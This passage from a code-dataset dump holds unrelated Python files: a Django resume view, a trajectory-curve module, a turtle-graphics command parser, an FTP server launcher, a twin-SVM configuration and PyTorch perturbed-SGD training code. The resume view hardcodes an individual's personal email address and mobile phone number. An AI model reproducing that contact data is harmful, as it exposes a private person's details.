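print(f'tail-average rho = {tail:.4f} (analytic value ~ 0.4286)')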
Barat'\nemail='herrywijaya065116076@unpak.ac.id'\ntelephone='0895632067037'\n# Create your views here.\ndef index(request):\n a=list(skill.objects.all())\n b=list(license.objects.all())\n c=list(experience.objects.all())\n d=list(education.objects.all())\n return render(request,'resume/index.html',{'title':title,'name':name,\n 'occupation':occupation,\n 'address':address,\n 'email':email,\n 'telephone':telephone,\n 'a':a,\n 'summary':summary,\n 'b':b,\n 'c':c,\n 'd':d\n })\n","sub_path":"portfolio/resume/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"581644796","text":"import math\nfrom copy import deepcopy\nimport numpy as np\nfrom numpy import pi\n\n# import matplotlib.pyplot as plt\nfrom scipy import interpolate\nfrom scipy.optimize import fminbound\nfrom gncgym.utils import angwrap\n\n\nclass Trajectory:\n def __init__(self, t,\n x, y, z=None, u=None, v=None, w=None,\n roll=None, pitch=None, yaw=None, rollrate=None, pitchrate=None, yawrate=None):\n pass\n\n def __call__(self, *args, **kwargs):\n pass\n\nclass ParamLine():\n def __init__(self, startpoint, endpoint):\n self.startpoint = startpoint\n self.endpoint = endpoint\n x1, y1 = startpoint\n x2, y2 = endpoint\n dx = x2 - x1\n dy = y2 - y1\n L = math.sqrt(dx ** 2 + dy ** 2)\n a_x = dx/L\n a_y = dy/L\n\n self.A = np.array([[a_x], [a_y]])\n self.p0 = np.array([[x1], [y1]])\n self.length = L\n self.angle = angwrap(np.arctan2(dy, dx))\n\n def __call__(self, s):\n s = np.array(s)\n return self.p0 + self.A * np.vstack([s,s])\n\n def get_angle(self, s=None):\n if s is None:\n return self.angle\n s = np.array(s)\n if s.shape == ():\n s = np.array([s])\n return np.array([self.angle for i in s])\n\n def get_endpoint(self):\n return self(self.length)\n\n def get_closest_s(self, p):\n p = np.vstack(p)\n # if p.shape != 2:\n # p = np.transpose(p)\n return fminbound(lambda s: np.linalg.norm(self(s) - p), 0, self.length, xtol=1e-2)\n\n def plot(self, ax, s, *opts):\n\n z = self(s)\n ax.plot(-z[1,:], z[0,:], *opts)\n\n def __reversed__(self):\n return ParamLine(self.endpoint, self.startpoint)\n\n\nclass ParamCurve():\n def __init__(self, waypoints):\n waypoints = np.array(waypoints)\n if waypoints.shape[0] != 2:\n waypoints = np.transpose(waypoints)\n\n Z = waypoints\n for i in range(3):\n S = arc_len(Z)\n C = interpolate.pchip(x=S, y=Z, axis=1)\n Z = C(np.linspace(S[0], S[-1], 1000))\n\n self.C = C\n self.s_min = S[0]\n self.s_max = S[-1]\n self.length = self.s_max\n\n def __call__(self, s, check_domain=False):\n s = np.array(s)\n if check_domain and s.min() < self.s_min or s.max() > self.s_max:\n pass\n # logging.warning('Argument s outside of curve domain: {}'.format((self.s_min, self.s_max)))\n return self.C(s)\n\n def get_angle(self, s, check_domain=False):\n s = np.array(s)\n if check_domain and s.min() < self.s_min or s.max() > self.s_max:\n pass\n # logging.warning('Argument s outside of curve domain: {}'.format((self.s_min, self.s_max)))\n\n if s.shape == ():\n s = np.array([s])\n output = []\n for ss in s:\n dx, dy = (self.C(ss + 0.05) - self.C(ss - 0.05)).flatten()\n output.append(angwrap(np.arctan2(dy, dx)))\n return np.array(output)\n\n def get_endpoint(self):\n return self(self.s_max)\n\n def get_closest_s(self, p):\n # p = np.vstack(p)\n # if p.shape != 2:\n # p = np.transpose(p)\n\n def distance(p1, p2):\n return np.sqrt((float(p1[0]) - float(p2[0]))**2 + (float(p1[1]) - float(p2[1]))**2)\n\n return 
fminbound(lambda s: distance(self(s), p), x1=0, x2=self.length, xtol=1e-6, maxfun=10000)\n\n def __reversed__(self):\n curve = deepcopy(self)\n C = curve.C\n curve.C = lambda s: C(curve.length-s)\n return curve\n\n def plot(self, ax, s, *opts):\n s = np.array(s)\n z = self(s)\n ax.plot(-z[1,:],z[0,:], *opts)\n\n\nclass ParamCircle:\n def __init__(self, center, radius):\n self.R = radius\n self.center = np.array(center)\n if self.center.shape == (2,):\n self.center = np.transpose([self.center])\n self.length = 2*pi*self.R\n\n def __call__(self, s):\n p = np.vstack([self.R*np.cos(s/self.R), self.R*np.sin(s/self.R)])\n return p + self.center\n\n def get_angle(self, s):\n s = np.array(s)\n if s.shape == ():\n s = np.array([s])\n return np.array([angwrap(pi/2 + ss/self.R) for ss in s])\n\n def get_endpoint(self):\n return self(self.length-100)\n\n def get_closest_s(self, p):\n # p = np.vstack(p)\n # if p.shape != 2:\n # p = np.transpose(p)\n\n def distance(p1, p2):\n return np.sqrt((float(p1[0]) - float(p2[0]))**2 + (float(p1[1]) - float(p2[1]))**2)\n\n return fminbound(lambda s: distance(self(s), p), x1=0, x2=self.length, xtol=1e-3, maxfun=10000)\n\n def plot(self, ax, s, *opts):\n s = np.array(s)\n z = self(s)\n ax.plot(-z[1, :], z[0, :], *opts)\n\n\nclass RandomLineThroughOrigin(ParamLine):\n def __init__(self, rng, length=100, origin=(0,0)):\n angle = math.pi*rng.randint(0, 360)/180\n x1, y1 = math.cos(angle)*length/2 + origin[0], math.sin(angle)*length/2 + origin[1]\n x2, y2 = -x1, -y1\n super().__init__([x1, y1], [x2, y2])\n\n\nclass RandomCurveThroughOrigin(ParamCurve):\n def __init__(self, rng, start, end=None):\n p = []\n if end is None:\n end = -np.array(start)\n\n for vec in [start, end]:\n vec = np.array(vec)\n L = np.sqrt(np.sum(vec ** 2))\n p.append(vec/2.0 + L/4*(rng.rand()-0.5))\n\n super().__init__([start, p[0], [0, 0], p[1], end])\n\n\ndef arc_len(Z):\n Z = np.array(Z)\n diffZ = np.diff(Z, axis=1)\n dZ = np.sqrt(np.sum(diffZ ** 2, axis=0))\n return np.concatenate([[0], np.cumsum(dZ)])\n\n\nif __name__ == '__main__':\n from random import random\n import matplotlib.pyplot as plt\n fig, (ax11, ax12) = plt.subplots(1, 2)\n\n start = 10*(random()-0.5), 10*(random()-0.5)\n end = -start[0] + 3*(random()-0.5), -start[1] + 3*(random()-0.5)\n\n C = ParamCircle((0,1), 5)\n s = np.linspace(0, C.length, 500)\n z = C(s)\n a = C.get_angle(s)\n ax11.plot(z[0, :], z[1, :], 'b')\n ax11.plot([0], [1], 'ro')\n ax11.axis('equal')\n\n # ax11.plot(start[0], start[1], 'go')\n\n ax12.plot(s, a, 'g')\n ax12.axis([min(s), max(s), -pi, pi])\n\n\n\n plt.show()\n","sub_path":"src/gncgym/trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"557048694","text":"#-*- coding: utf-8 -*-\n\n# Trolle Geuna\n# Oskar Casselryd\n\n\nfrom sys import stdin, setrecursionlimit\nimport re\nimport math\nfrom syntaxfel import Syntaxfel\nfrom linkedQFile import *\n\nclass Node(object):\n def __init__(self, data, row, nextnode=None):\n self.data = data\n self.nextnode = nextnode\n self.row = row\n\n def __str__(self):\n return str(self.data)\n\nclass Leonardo(object):\n def __init__(self):\n self.x = float(0.0000)\n self.y = float(0.0000)\n self.color = \"#0000FF\"\n self.angle = 0\n self.down = False\n self.printout = []\n\n\n def __str__(self):\n return str(self.color, self.x1, self.y1, self.x2, self.y2)\n\n\ndef main():\n setrecursionlimit(100000)\n # skapar en liten liten sköldpadda\n 
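# Both ParamLine and ParamCircle in the trajectory module above are arc-length
# parametrised, so the finite-difference speed |p(s+h) - p(s)| / h should be ~1
# everywhere along the path. A hedged numeric check (assumes the module above
# imports cleanly as gncgym.trajectory):
import numpy as np
from gncgym.trajectory import ParamCircle

c = ParamCircle(center=(0.0, 1.0), radius=5.0)
h = 1e-4
s = np.linspace(0.0, c.length - h, 50)
speed = np.linalg.norm(c(s + h) - c(s), axis=0) / h  # c(.) returns a 2xN array
assert np.allclose(speed, 1.0, atol=1e-3)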
leonardo = Leonardo()\n q = LinkedQ()\n # stdin = open(\"firstsample.in\")\n\n rad = stdin.readline()\n\n row = 1\n\n while rad:\n rad = rad.split(\"%\", 1)[0] # Ta bort kommentarer.\n\n for tkn in rad.split():\n buildTokens(q, tkn, row) # Lägg till tokens.\n\n row =row +1\n rad = stdin.readline() # Läs in ny rad.\n\n try: # Skriv ut alla linjer\n match(q, leonardo)\n for i in range(0, len(leonardo.printout)): # Skriv ut allt när vi är klara.\n print(leonardo.printout[i])\n\n # Såvida det inte failar. Då skriver vi ut syntaxfel.\n except Syntaxfel as felet:\n print(felet)\n\n# Lägger till tokens i q.\ndef buildTokens(q, tkn, row):\n if tkn != None:\n # \"X\n if re.search(\"^\\\".+$\", tkn, re.IGNORECASE):\n q.enqueue(\"\\\"\", row)\n buildTokens(q, tkn[1:], row)\n\n # X\"\n elif re.search(\".+\\\"\", tkn, re.IGNORECASE):\n buildTokens(q, tkn[:-1], row)\n q.enqueue(\"\\\"\", row)\n\n #### X.X. ####\n elif re.search(\"^.+\\..+$\", tkn, re.IGNORECASE):\n splitshit = tkn.split(\".\")\n # Låt nästa varv ta hand om det.\n buildTokens(q, splitshit[0], row)\n # lägg till en punkt!\n q.enqueue(\".\", row)\n # Kör detta genom buildTokens igen.\n nyToken = \".\".join(splitshit[1:])\n\n buildTokens(q, nyToken, row)\n\n # helvete = re.findall(\"\\.\", tkn)\n # helvete2 = re.findall(\"[^\\.]\", tkn)\n # print(\"här är helvete:\", helvete)\n # print(\"helvete 2: \", helvete2)\n # if re.search(\"^\\..+$\", tkn, re.IGNORECASE):\n # # börjar på punkt\n # elif re.search(\"^.+\\.$\", tkn, re.IGNORECASE):\n # # slutar på punkt\n # elif re.search(\"^\\..+\\.$\", tkn, re.IGNORECASE):\n # # börjar och slutar på punkt\n # else:\n # # ingen punkt i början eller slut\n #\n # splittad = tkn.split(\".\")\n # for i in range(0, len(splittad)): # Lägg till alla saker i vår nya queue\n # if splittad[i] != \"\":\n # buildTokens(q, splittad[i], row)\n # print(\"Argument: \",q.last.data)\n # if q.last.data.upper() == \"DOWN\" or q.last.data.upper() == \"UP\":\n # q.enqueue(\".\", row)\n # print(\"Punkt: \",q.last.data)\n\n # X.\n elif re.search(\"^.+\\.$\", tkn):\n buildTokens(q, tkn[:-1], row)\n q.enqueue(\".\", row)\n\n # .X\n elif re.search(\"^\\..+$\", tkn):\n q.enqueue(\".\", row)\n buildTokens(q, tkn[:-1], row)\n\n # Alla \"vanliga\" ord/tecken.\n else:\n if tkn != \"\":\n q.enqueue(tkn, row)\n\n\n\n\n\ndef match(q,leonardo):\n\n latestRow = 0\n\n # Vi måste ha en queue.\n if q == None:\n return\n\n # Kolla edge-case.\n if q.peek() == None :\n return\n\n # DOWN eller UP\n elif re.search(\"^(DOWN|UP)$\", q.peek(), re.IGNORECASE):\n latestRow = q.first.row\n updown(leonardo, q.peek().upper())\n q.dequeue()\n\n # Kolla att det är en punkt efter!\n if q.peek()==\".\":\n latestRow = q.first.row\n q.dequeue()\n match(q,leonardo)\n\n # Kasta error om punkt saknas.\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n # LEFT, RIGHT, FORW, BACK\n elif re.search(\"^(LEFT|RIGHT|FORW|BACK)$\", q.peek(), re.IGNORECASE):\n latestRow = q.first.row\n inst = q.peek() # Spara instruktionen.\n q.dequeue()\n\n # Plocka ut numret efter. isNumber raisar error vid behov.\n n = isNumber(q.peek())\n if not n: # isNumber return false. Det är inte ett heltal.\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n q.dequeue()\n # Ändra grejer hos leonardo.\n move(leonardo, inst.upper(), n)\n\n # Kolla att det slutar med en punkt.\n if q.peek()==\".\":\n latestRow = q.first.row\n q.dequeue()\n\n match(q, leonardo) # Kalla match igen. 
Rekursivt o grejer.\n\n # Raise error annars.\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n\n elif re.search(\"^COLOR$\", q.peek(), re.IGNORECASE):\n # print(\"Matchar COLOR\")\n latestRow = q.first.row\n q.dequeue()\n\n if re.search(\"^#([0-9]|[A-F]|[a-f]){6}$\", q.peek()):\n leonardo.color = q.peek().upper()\n latestRow = q.first.row\n q.dequeue()\n if q.peek()==\".\":\n # print(\"Matchar COLOR HEX .\")\n latestRow = q.first.row\n q.dequeue()\n match(q, leonardo)\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n\n elif re.search(\"^REP$\", q.peek(), re.IGNORECASE):\n # print(\"Matchar REP\")\n latestRow = q.first.row\n q.dequeue()\n newQ,latestRow = repHelp(q)\n match(newQ, leonardo)\n # print(\"KLARA MED REP\")\n match(q, leonardo)\n\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n\n\ndef repHelp(q, inner = False):\n\n n = isNumber(q.peek())\n row = q.first.row\n latestRow = q.first.row\n if n:\n # print(\"NUMMER\")\n q.dequeue()\n listData = []\n listRow = []\n\n ######### CASE MED CITATTECKEN #########\n if q.peek()==\"\\\"\":\n # print(\"CITATTECKEN\")\n latestRow = q.first.row\n q.dequeue()\n\n while q.peek() != \"\\\"\" and q.peek() != None:\n # print(\"WHILE\", q.peek())\n\n\n ##### NÄSTLAD LOOP ######\n if q.peek().upper() == \"REP\": # REP I REP\n # print(\"NÄSTLAD REP\")\n latestRow = q.first.row\n q.dequeue()\n\n nextQ, latestRow = repHelp(q, True)\n while nextQ.peek() != None:\n listRow.append(nextQ.first.row) # lägg till rad och\n #latestRow = nextQ.first.row\n listData.append(nextQ.first.data) # data i våra listor\n nextQ.dequeue()\n ##### SLUT PÅ NÄSTLAD LOOP #####\n\n # print(\"listData: \", listData)\n # Lägg till i listorna\n if q.peek() == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n\n if q.peek() != \"\\\"\" and q.peek().upper() != \"REP\":\n listRow.append(q.first.row)\n listData.append(q.first.data)\n latestRow = q.first.row\n q.dequeue()\n\n\n if q.peek() == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n latestRow = q.first.row\n q.dequeue() # Ta bort \"\n\n\n\n ######## CASE UTAN CITATTECKEN, GÅ EFTER ROW ISTÄLLET #########\n else:\n\n # NÄSTLAD LOOP\n if q.peek().upper() == \"REP\":\n # print(\"Rep i rep utan citat\")\n\n latestRow = q.first.row\n q.dequeue()\n # print(\"Gått in i nästlad rep\")\n nextQ,latestRow = repHelp(q)\n\n while nextQ.peek() != None:\n # print(\"NextQ: \", nextQ.peek())\n listRow.append(nextQ.first.row) # lägg till rad och\n listData.append(nextQ.first.data) # data i våra listor\n # latestRow = q.first.row\n nextQ.dequeue()\n\n # REP 5 LEFT 90.\n elif q.peek() != None:\n nextElemtAintNone = True\n while nextElemtAintNone:\n # print(\"STUFF I WHILE: \", q.peek())\n\n if q.peek() == \".\":\n listData.append(\".\")\n listRow.append(q.first.row)\n latestRow = q.first.row\n q.dequeue() # Ta bort punkten.\n nextElemtAintNone = False\n\n elif q.peek() != None: # special case om vi haft en rep i denna rep\n listRow.append(q.first.row)\n listData.append(q.first.data)\n # print(\"ETT VARV:\", q.peek())\n latestRow = q.first.row\n q.dequeue()\n else:\n 
nextElemtAintNone = False\n\n\n # Lägg till i listorna\n\n\n ########## HÄR SLUTAR CASET #############\n\n\n\n\n\n\n # print(\"DETTA ÄR LISTAN:\")\n # print(listData)\n\n newQ = LinkedQ()\n while n > 0:\n for i in range(0, len(listData)): # Lägg till alla saker i vår nya queue\n # print(\"ewQ: \", listData[i])\n newQ.enqueue(listData[i], listRow[i])\n n = n-1\n\n\n return newQ,latestRow\n\n\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n\n\n\n\n# Endast UP, DOWN, LEFT, RIGTH får skickas in här.\ndef updown(leo, inst):\n if inst == \"UP\":\n leo.down = False\n elif inst == \"DOWN\":\n leo.down = True\n\n return\n\n# Utför operationer med Leonardo.\ndef move(leo, inst, arg):\n if inst == \"LEFT\":\n leo.angle += arg\n elif inst == \"RIGHT\":\n leo.angle -= arg\n elif inst == \"FORW\":\n createRoute(leo, arg)\n elif inst == \"BACK\":\n createRoute(leo, -arg)\n return leo\n\n# Kolla att nodens data är ett tal följt av en punkt.\n# Return talet.\ndef isNumber(s):\n if re.search(\"^\\d+$\", s):\n return int(s)\n\n return False\n\n\n\n\ndef createRoute(leo, d):\n newX = float(leo.x + d * math.cos((math.pi*leo.angle)/180))\n newY = float(leo.x + d * math.sin((math.pi*leo.angle)/180))\n #(x+dcos(πv/180),y+dsin(πv/180))\n\n # Faktiska värden.\n newX = float(\"{0:.5f}\".format(leo.x + d * math.cos((math.pi*leo.angle)/180)))\n newY = float(\"{0:.5f}\".format(leo.y + d * math.sin((math.pi*leo.angle)/180)))\n if newX == -0:\n newX = 0\n if newY == -0:\n newY = 0\n\n\n # Det vi skriver ut.\n if leo.down:\n xS = '%.4f' % leo.x\n yS = '%.4f' % leo.y\n xNS = '%.4f' % newX\n yNS = '%.4f' % newY\n leo.printout.append(leo.color+\" \"+xS+\" \"+yS+\" \"+xNS+\" \"+yNS)\n leo.x = newX\n leo.y = newY\n\n\n\n\n\n\n\n\n\n\n\nmain()\n","sub_path":"S2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"631008222","text":"# coding=utf-8\n\nfrom handlers import FTPCommandHandler, ls_callback, open_callback, cd_callback, rm_callback, get_callback, put_callback, FileHandler\nfrom threaded_server import FTPServer\nfrom ftp_client_handler import FTPClientHandler\n\nif __name__ == '__main__':\n server = FTPServer(\"0.0.0.0\", 50000, 5)\n server.listen()\n callback_table = {\n \"ls\": ls_callback,\n \"open\": open_callback,\n \"cd\": cd_callback,\n \"rm\": rm_callback,\n \"get\": get_callback,\n \"put\": put_callback\n }\n server.accept_connections(FTPClientHandler, FTPCommandHandler(callback_table), FileHandler(), True)\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"68655281","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 18 13:54:15 2018\n\n@author: Mir, A.\n\"\"\"\n\nfrom dataproc import read_data\nfrom eval_classifier import initializer\nfrom collections import OrderedDict\n\nclass UserInput:\n\n \"\"\"\n This class stores user inputs\n \"\"\"\n\n def __init__(self, data_tuple, cl_type, result_path, kernel, \\\n rect_k, test_m_tuple, dict_para):\n\n # Initializing all the inputs\n self.X_train, self.y_train = data_tuple[0], data_tuple[1]\n self.filename = data_tuple[2]\n self.classifier_type = cl_type\n self.result_path = result_path\n self.kernel_type = kernel\n self.rect_kernel = rect_k # Percentage of samples 
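# buildTokens in the turtle-graphics parser above peels '"' and '.' off the ends of
# whitespace-separated chunks recursively; the same tokenisation can be sketched in
# one pass with a regex. This is a hedged illustration, not a drop-in replacement:
# it does not preserve the queue and row-number bookkeeping of the original.
import re

def tokenize(line):
    line = line.split('%', 1)[0]  # strip comments, as main() does
    return re.findall(r'"|\.|[^\s".]+', line)

assert tokenize('REP 2 "FORW 1. LEFT 90."') == ['REP', '2', '"', 'FORW', '1', '.', 'LEFT', '90', '.', '"']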
for Rectangular kernel\n self.test_method_tuple = test_m_tuple\n \n # Parameters\n #self.lower_b_c, self.upper_b_c = l_b_c, u_b_c\n #self.knn_l, self.knn_u = k_l, k_u\n # Lower and upper bounds of gamma parameter\n #self.lower_b_u, self.upper_b_u = l_b_u, u_b_u\n \n self.dict_parameters = dict_para\n\n\nif __name__ == '__main__':\n \n \"\"\"\n List of classifiers\n TSVM\n TBSVM\n WTSVM\n RKTSVM\n \"\"\"\n \n # Default parameters for each classifier\n # {'C1': (-5, 5), 'C2': (-5, 5), 'C3': (0, 0), 'k': (2, 8), \\\n # 'u': (0, 0)}\n def_para_RKTSVM = {'C1': (-5, 2), 'C2': (-5, 2), 'C3': None, 'k': (2, 12),\n 'u': None}\n \n def_para_TSVM = {'C1': (-5, 2), 'C2': (-5, 2), 'C3': None, 'k': None, \\\n 'u': (-10, 2)}\n \n def_para_TBSVM = {'C1': (-8, 2), 'C2': None, 'C3': (-8, 2), 'C4': None, \\\n 'u': (-10, 2)}\n \n def_para_WTSVM = {'C1': (-5, 2), 'C2': None, 'C3': None, 'k': (3, 12), \\\n 'u': (-10, 2)}\n \n dataset = read_data('../dataset/Fertility.csv')\n \n user_in_obj = UserInput(dataset, 'TBSVM', './result', 'RBF', 1, \\\n ('CV', 5), def_para_TBSVM)\n \n initializer(user_in_obj)\n ","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"423037943","text":"import time\nimport numpy as np\nimport torch\n\nfrom torch.autograd import Variable\n\nfrom maps import NamedDict\n\nimport data_utils\nimport utils\n\nfrom pdb import set_trace as st\n\ndef vectors_dims_dont_match(Y,Y_):\n '''\n Checks that vector Y and Y_ have the same dimensions. If they don't\n then there might be an error that could be caused due to wrong broadcasting.\n '''\n DY = tuple( Y.size() )\n DY_ = tuple( Y_.size() )\n if len(DY) != len(DY_):\n return True\n for i in range(len(DY)):\n if DY[i] != DY_[i]:\n return True\n return False\n\ndef index_batch(X,batch_indices,dtype):\n '''\n returns the batch indexed/sliced batch\n '''\n # if len(X.size()) == 1: # i.e. 
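# The (lower, upper) pairs in the parameter dicts above read as base-2 exponent
# ranges, e.g. C1 in [2**-5, 2**2]. A hedged sketch of expanding one dict into
# concrete candidate grids; the exponent interpretation is an assumption, since
# eval_classifier.initializer is the authority on how the bounds are consumed:
import numpy as np

def expand(bounds):
    return None if bounds is None else 2.0 ** np.arange(bounds[0], bounds[1] + 1)

grid = {name: expand(b) for name, b in def_para_TSVM.items()}
print(grid['C1'])  # [0.03125 ... 4.0]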
dimension (M,) just a vector\n # batch_xs = X[batch_indices].type(dtype)\n # else:\n # batch_xs = X[batch_indices,:].type(dtype)\n #batch_xs = torch.index_select(input=X,dim=0,index=batch_indices) #torch.index_select(input, dim, index, out=None)\n batch_xs = torch.index_select(X,0,batch_indices)\n return batch_xs\n\ndef get_batch2(X,Y,M,dtype):\n '''\n get batch for pytorch model\n '''\n # TODO fix and make it nicer, there is pytorch forum question\n dtype_x,dtype_y = (dtype[0],dtype[1]) if len(dtype) == 2 else (dtype,dtype)\n #X,Y = X.data.numpy(), Y.data.numpy()\n N = len(Y)\n valid_indices = np.array( range(N) )\n batch_indices = torch.LongTensor(np.random.choice(valid_indices,size=M,replace=False))\n batch_xs = index_batch(X,batch_indices,dtype_x)\n batch_ys = index_batch(Y,batch_indices,dtype_y)\n return batch_xs, batch_ys\n\ndef SGD_perturb(mdl, Xtr,Ytr,Xv,Yv,Xt,Yt, optimizer,loss, M,eta,nb_iter,A ,logging_freq ,dtype_x,dtype_y, perturbfreq,perturb_magnitude, reg,reg_lambda, stats_collector):\n '''\n '''\n classification_task = type(Ytr[0]) == np.int64\n ''' wrap data in torch '''\n Xtr,Xv,Xt = data_utils.data2FloatTensor(Xtr,Xv,Xt)\n Ytr,Yv,Yt = data_utils.data2LongTensor(Ytr,Yv,Yt) if classification_task else data_utils.data2FloatTensor(Ytr,Yv,Yt)\n ## wrap in pytorch Variables\n Xtr,Ytr,Xv,Yv,Xt,Yt = data_utils.data2torch_variable(Xtr,Ytr,Xv,Yv,Xt,Yt)\n ''' Start training '''\n N_train, _ = tuple( Xtr.size() )\n for i in range(0,nb_iter):\n optimizer.zero_grad()\n batch_xs, batch_ys = get_batch2(Xtr,Ytr,M,(dtype_x,dtype_y)) # [M, D], [M, 1]\n ''' FORWARD PASS '''\n y_pred = mdl(batch_xs)\n if vectors_dims_dont_match(batch_ys,y_pred) and not classification_task: ## Check vectors have same dimension\n raise ValueError(f'Your vectors don\\'t have matching dimensions. It will lead to errors: \\n batch_ys={batch_ys.size()},y_pred={y_pred.size()}')\n batch_loss = loss(input=y_pred,target=batch_ys) + reg_lambda*reg\n batch_loss.backward() # Use autograd to compute the backward pass. 
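# get_batch2 above samples M distinct row indices and gathers them with
# torch.index_select; a tiny standalone demonstration of that mechanism:
import numpy as np
import torch

X = torch.arange(10.0).view(5, 2)  # 5 examples, 2 features
Y = torch.arange(5.0)
idx = torch.LongTensor(np.random.choice(5, size=3, replace=False))
bx, by = torch.index_select(X, 0, idx), torch.index_select(Y, 0, idx)
assert bx.shape == (3, 2) and by.shape == (3,)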
Now w will have gradients\n \"\"\" Update parameters \"\"\"\n optimizer.step()\n ''' Collect training stats '''\n if i % (nb_iter/10) == 0 or i == 0 and False:\n current_train_loss,train_acc = stats_collector.loss(mdl,Xtr,Ytr),stats_collector.acc(mdl,Xtr,Ytr)\n current_test_loss,test_acc = stats_collector.loss(mdl,Xt,Yt),stats_collector.acc(mdl,Xt,Yt)\n print('\\n-------------')\n print(f'i={i}, current_train_loss={current_train_loss} \\ni={i}, train_error = {train_acc}')\n print(f'i={i}, current_test_loss={current_test_loss}, \\ni={i}, test_error = {test_acc}')\n ## stats logger\n if i % logging_freq == 0 or i == 0:\n stats_collector.collect_stats(i, mdl, Xtr,Ytr,Xv,Yv,Xt,Yt)\n ## DO OP\n if i%perturbfreq == 0 and perturb_magnitude != 0 and i != 0:\n for W in mdl.parameters():\n Din,Dout = W.data.size()\n std = perturb_magnitude\n noise = torch.normal(mean=0.0*torch.ones(Din,Dout),std=std)\n W.data.copy_(W.data + noise)\n\ndef SGD_pert_then_train(mdl, Xtr,Ytr,Xv,Yv,Xt,Yt, optimizer,loss, M,nb_iter ,logging_freq ,dtype_x,dtype_y, perturbfreq,perturb_magnitude, iterations_switch_mode, reg,reg_lambda, stats_collector):\n '''\n '''\n classification_task = type(Ytr[0]) == np.int64\n ''' wrap data in torch '''\n Xtr,Xv,Xt = data_utils.data2FloatTensor(Xtr,Xv,Xt)\n Ytr,Yv,Yt = data_utils.data2LongTensor(Ytr,Yv,Yt) if classification_task else data_utils.data2FloatTensor(Ytr,Yv,Yt)\n ## wrap in pytorch Variables\n Xtr,Ytr,Xv,Yv,Xt,Yt = data_utils.data2torch_variable(Xtr,Ytr,Xv,Yv,Xt,Yt)\n ''' Start training '''\n pert_mode = True\n N_train, _ = tuple( Xtr.size() )\n for i in range(0,nb_iter):\n optimizer.zero_grad()\n batch_xs, batch_ys = get_batch2(Xtr,Ytr,M,(dtype_x,dtype_y)) # [M, D], [M, 1]\n ''' FORWARD PASS '''\n y_pred = mdl(batch_xs)\n if vectors_dims_dont_match(batch_ys,y_pred) and not classification_task: ## Check vectors have same dimension\n raise ValueError(f'Your vectors don\\'t have matching dimensions. It will lead to errors: \\n batch_ys={batch_ys.size()},y_pred={y_pred.size()}')\n batch_loss = loss(input=y_pred,target=batch_ys) + reg_lambda*reg\n batch_loss.backward() # Use autograd to compute the backward pass. Now w will have gradients\n \"\"\" Update parameters \"\"\"\n optimizer.step()\n ''' Collect training stats '''\n if i % (nb_iter/10) == 0 or i == 0 and False:\n current_train_loss,train_acc = stats_collector.loss(mdl,Xtr,Ytr),stats_collector.acc(mdl,Xtr,Ytr)\n current_test_loss,test_acc = stats_collector.loss(mdl,Xt,Yt),stats_collector.acc(mdl,Xt,Yt)\n print('\\n-------------')\n print(f'i={i}, current_train_loss={current_train_loss}, i={i}, train_error = {train_acc}')\n print(f'i={i}, current_test_loss={current_test_loss}, i={i}, test_error = {test_acc}')\n ## stats logger\n if i % logging_freq == 0 or i == 0:\n stats_collector.collect_stats(i, mdl, Xtr,Ytr,Xv,Yv,Xt,Yt)\n ## DO OP\n if pert_mode:\n if i%perturbfreq == 0 and perturb_magnitude != 0 and i != 0:\n for W in mdl.parameters():\n Din,Dout = W.data.size()\n std = perturb_magnitude\n noise = torch.normal(mean=0.0*torch.ones(Din,Dout),std=std*torch.ones(Din,Dout))\n W.data.copy_(W.data + noise)\n ''' switch mode? 
'''\n pert_mode = (i < iterations_switch_mode)\n\n######\n\nclass StatsCollector:\n '''\n Class that has all the stats collected during training.\n '''\n def __init__(self, mdl,loss,accuracy, dynamic_stats=None):\n '''\n dynamic_stats = an array of tuples (STORER,UPDATER) where the storer\n is a data structure (like a list) that gets updated according to updater.\n For the moment updater receives storer and all the parameters from collect_stats\n (like the mdl, the data sets, the iteration number)\n '''\n ''' functions that encode reward/loss '''\n self.loss = loss\n self.acc = accuracy\n ''' loss & errors lists'''\n self.train_losses, self.val_losses, self.test_losses = [], [], []\n self.train_errors, self.val_errors, self.test_errors = [], [], []\n self.train_accs, self.val_accs, self.test_accs = [], [], []\n ''' stats related to parameters'''\n nb_param_groups = len( list(mdl.parameters()) )\n self.grads = [ [] for i in range(nb_param_groups) ]\n self.w_norms = [ [] for i in range(nb_param_groups) ]\n ''' '''\n if dynamic_stats is not None:\n self.dynamic_stats_storer = {}\n self.dynamic_stats_updater = {}\n for name,(storer,updater) in dynamic_stats.items():\n self.dynamic_stats_storer[name] = storer\n 